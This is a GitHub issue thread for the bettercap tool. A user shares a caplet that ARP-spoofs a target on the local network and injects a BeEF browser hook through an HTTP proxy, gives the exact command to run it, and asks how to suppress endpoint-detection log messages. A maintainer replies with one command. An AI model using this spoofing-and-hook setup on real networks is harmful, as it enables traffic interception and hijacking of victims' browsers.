### ISSUE TITLE
bettercap arp spoof generates a lot of detect information

### ISSUE THREAD

**Issue by uemahra** [bettercap/bettercap#839]
latest version

**cap file is this:**
```
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.109.142"

# inject beef hook
set http.proxy.script beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1

# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
```

**command is like this:**
bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.105" -iface wlan1

when the command executes, bettercap starts to generate a lot of information like:
» [03:37:08] [endpoint.new] endpoint 192.168.1.106 detected as 62:2a:96:25:ee:e5.
192.168.1.0/24 > 192.168.1.105  » [03:37:38] [endpoint.new] endpoint 192.168.1.103 detected as 0c:dd:24:d3:41:72.
192.168.1.0/24 > 192.168.1.105  » [03:37:45] [endpoint.new] endpoint 192.168.1.100 detected as 30:b4:9e:71:1e:vf (Tp-Link Technologies Co.,Ltd.).
192.168.1.0/24 > 192.168.1.105  » [03:37:49] [endpoint.lost] endpoint 192.168.1.103 0c:dd:24:d3:41:72 lost.
192.168.1.0/24 > 192.168.1.105  » [03:37:54] [endpoint.new] endpoint 192.168.1.101 detected as f8:34:41:87:8f:54 (Intel Corporate).
192.168.1.0/24 > 192.168.1.105  » [03:37:57] [endpoint.lost] endpoint 192.168.1.100 30:b4:9e:71:1e:vf (Tp-Link Technologies Co.,Ltd.) lost.
192.168.1.0/24 > 192.168.1.105  » [03:38:06] [endpoint.lost] endpoint 192.168.1.101 f8:34:41:87:8f:54 (Intel Corporate) lost.
192.168.1.0/24 > 192.168.1.105  » [03:38:48] [endpoint.new] endpoint 192.168.1.100 detected as 30:b4:9e:71:1e:vf (Tp-Link Technologies Co.,Ltd.).
192.168.1.0/24 > 192.168.1.105  » [03:38:48] [endpoint.new] endpoint 192.168.1.103 detected as 0c:dd:24:d3:41:72.
192.168.1.0/24 > 192.168.1.105  » [03:38:49] [endpoint.new] endpoint 192.168.1.101 detected as f8:34:41:87:8f:54 (Intel Corporate).
192.168.1.0/24 > 192.168.1.105  » [03:38:57] [endpoint.lost] endpoint 192.168.1.100 30:b4:9e:71:1e:vf (Tp-Link Technologies Co.,Ltd.) lost.
192.168.1.0/24 > 192.168.1.105  » [03:38:58] [endpoint.lost] endpoint 192.168.1.101 f8:34:41:87:8f:54 (Intel Corporate) lost.
192.168.1.0/24 > 192.168.1.105  » [03:38:59] [endpoint.lost] endpoint 192.168.1.103 0c:dd:24:d3:41:72 lost.
192.168.1.0/24 > 192.168.1.105  » [03:39:38] [endpoint.new] endpoint 192.168.1.103 detected as 0c:dd:24:d3:41:72.
192.168.1.0/24 > 192.168.1.105  » [03:39:44] [endpoint.new] endpoint 192.168.1.101 detected as f8:34:41:87:8f:54 (Intel Corporate).
192.168.1.0/24 > 192.168.1.105  » [03:39:44] [endpoint.new] endpoint 192.168.1.100 detected as 30:b4:9e:71:1e:vf (Tp-Link Technologies Co.,Ltd.).
192.168.1.0/24 > 192.168.1.105  » [03:39:54] [endpoint.lost] endpoint 192.168.1.103 0c:dd:24:d3:41:72 lost.
192.168.1.0/24 > 192.168.1.105  » [03:39:53] [endpoint.lost] endpoint 192.168.1.101 f8:34:41:87:8f:54 (Intel Corporate) lost.
192.168.1.0/24 > 192.168.1.105  » [03:39:54] [endpoint.new] endpoint 192.168.1.101 detected as f8:34:41:87:8f:54 (Intel Corporate).

how to prevent bettercap to do such endpoint detect actions? the 192.168.1.105 is my only target. I tried arp.whitelist command, but can't disable this. Cause my equipment is a raspberry, I need to reduce the performance cost as much as I can.

**Comment by buffermet** [comment]
`events.ignore endpoint`
